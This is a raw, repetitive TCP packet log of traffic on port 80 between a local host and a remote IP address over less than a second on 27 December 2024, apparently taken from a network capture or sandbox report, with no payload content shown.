                                                        Dec 27, 2024 14:53:42.851974964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.896949053 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.921660900 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.921739101 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.921789885 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.922036886 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.922137976 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.922171116 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.922905922 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.923029900 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.923065901 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.923758030 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.940866947 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.940881968 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.940938950 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.941183090 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.941229105 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.941294909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.942050934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.942091942 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.942140102 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.942950964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.942991972 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.943039894 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.943799973 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.943828106 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.943847895 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.944618940 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.944662094 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.944730997 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.945528984 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.945570946 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.945614100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.946343899 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.946388006 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.946470976 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.947216988 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.947259903 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.947350025 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.948081970 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.948122025 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.948162079 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.948932886 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.948976040 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.949035883 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.949810028 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.949847937 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.949872971 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.950659037 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.950699091 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.950779915 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.951523066 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.951564074 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.951627970 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.952388048 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.952434063 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.952469110 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.953413010 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.953455925 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.953499079 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.954381943 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.954425097 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.954468012 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.955302000 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.955338001 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.955363989 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.956155062 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.956196070 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.956265926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.956934929 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.956974983 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.956999063 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.957642078 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.957693100 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.957700014 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.958420038 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.958467007 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.958520889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.959305048 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.959346056 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.959387064 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.960269928 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.960319042 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.960403919 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.961045980 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.961101055 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.961119890 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.961867094 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.961905003 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.961990118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.962743998 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.962757111 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.962791920 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.006331921 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.034213066 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.034336090 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.034426928 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.034430981 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.034548998 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.034590960 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.035322905 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.035444975 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.035486937 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.036147118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.036271095 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.036315918 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.037044048 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.037138939 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.037178040 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.037869930 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.037980080 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.038018942 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.038742065 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.038893938 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.038933039 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.039619923 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.039640903 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.039679050 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.040453911 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.040563107 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.040604115 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.041331053 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.041434050 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.041476011 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.042201996 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.042320967 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.042368889 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.043051958 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.043153048 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.043195009 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.043926954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.044045925 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.044086933 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.044822931 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.044969082 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.045008898 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.045644045 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.045762062 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.045805931 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.046480894 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.046639919 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.046684027 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.047363043 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.047467947 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.047509909 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.048224926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.048300982 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.048347950 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.049074888 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.049125910 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.049165010 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.049946070 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.050139904 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.050183058 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.050837994 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.050944090 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.050983906 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.051693916 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.051810026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.051855087 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.052536011 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.052644968 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.052685976 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.053441048 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.053539991 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.053581953 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.122921944 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.123037100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.123087883 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.123354912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.123516083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.123554945 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.123621941 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.124434948 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.124476910 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.124519110 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.125221014 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.125260115 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.142582893 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.142616034 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.142786980 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.142821074 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.142905951 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.142961979 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.143582106 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.143786907 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.143836021 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.144501925 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.144571066 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.144618988 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.145246983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.145344019 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.145390987 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.146087885 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.146187067 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.146235943 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.146874905 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.147011995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.147064924 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.147777081 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.147835970 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.147871017 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.148823023 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.149122953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.149166107 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.149454117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.149564028 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.149605989 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.150346994 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.150430918 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.150469065 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.151197910 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.151297092 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.151335955 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.152050972 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.152137995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.152179003 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.152946949 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.153034925 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.153079987 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.153767109 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.153883934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.153923988 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.154648066 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.154934883 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.154999018 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.155486107 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.155590057 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.155632973 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.156352043 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.156426907 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.156471014 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.157265902 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.157326937 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.157370090 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.158066988 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.158267975 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.158325911 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.158919096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.158991098 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.159029961 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.159885883 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.160006046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.160039902 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.160708904 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.160778999 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.160823107 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.161504030 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.161627054 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.161675930 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.162383080 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.162477970 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.162517071 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.163256884 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.163352966 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.163393974 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.164088964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.164134026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.164171934 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.235913992 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.235955954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.236044884 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.236264944 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.236361027 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.236404896 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.237113953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.237215042 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.237255096 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.237941027 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.238053083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.238092899 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.238815069 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.238909006 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.238956928 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.239686012 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.239816904 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.239857912 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.240592003 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.240683079 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.240719080 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.241084099 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.241209030 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.241255999 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.241935015 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.241988897 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.242028952 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.242784023 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.242907047 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.242952108 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.243657112 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.243716002 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.243755102 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.244529963 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.244558096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.244601011 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.245424986 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.245492935 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.245532990 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.246247053 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.246347904 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.246403933 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.247116089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.247188091 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.247226954 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.247967005 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.248089075 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.248164892 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.248883009 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.249011993 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.249054909 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.249735117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.249834061 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.249874115 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.250539064 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.250659943 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.250699997 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.251429081 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.251517057 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.251554966 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.252315998 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.252412081 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.252449036 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.253144979 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.253396988 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.253439903 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.253995895 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.254143953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.254185915 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.254851103 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.254935980 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.254976034 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.324604988 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.324743032 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.324790955 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.325022936 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.325145960 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.325182915 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.325911999 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.326067924 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.326105118 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.326757908 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.343579054 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.343596935 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.343647003 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.343918085 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.343955040 CET4972180192.168.2.1087.120.113.91
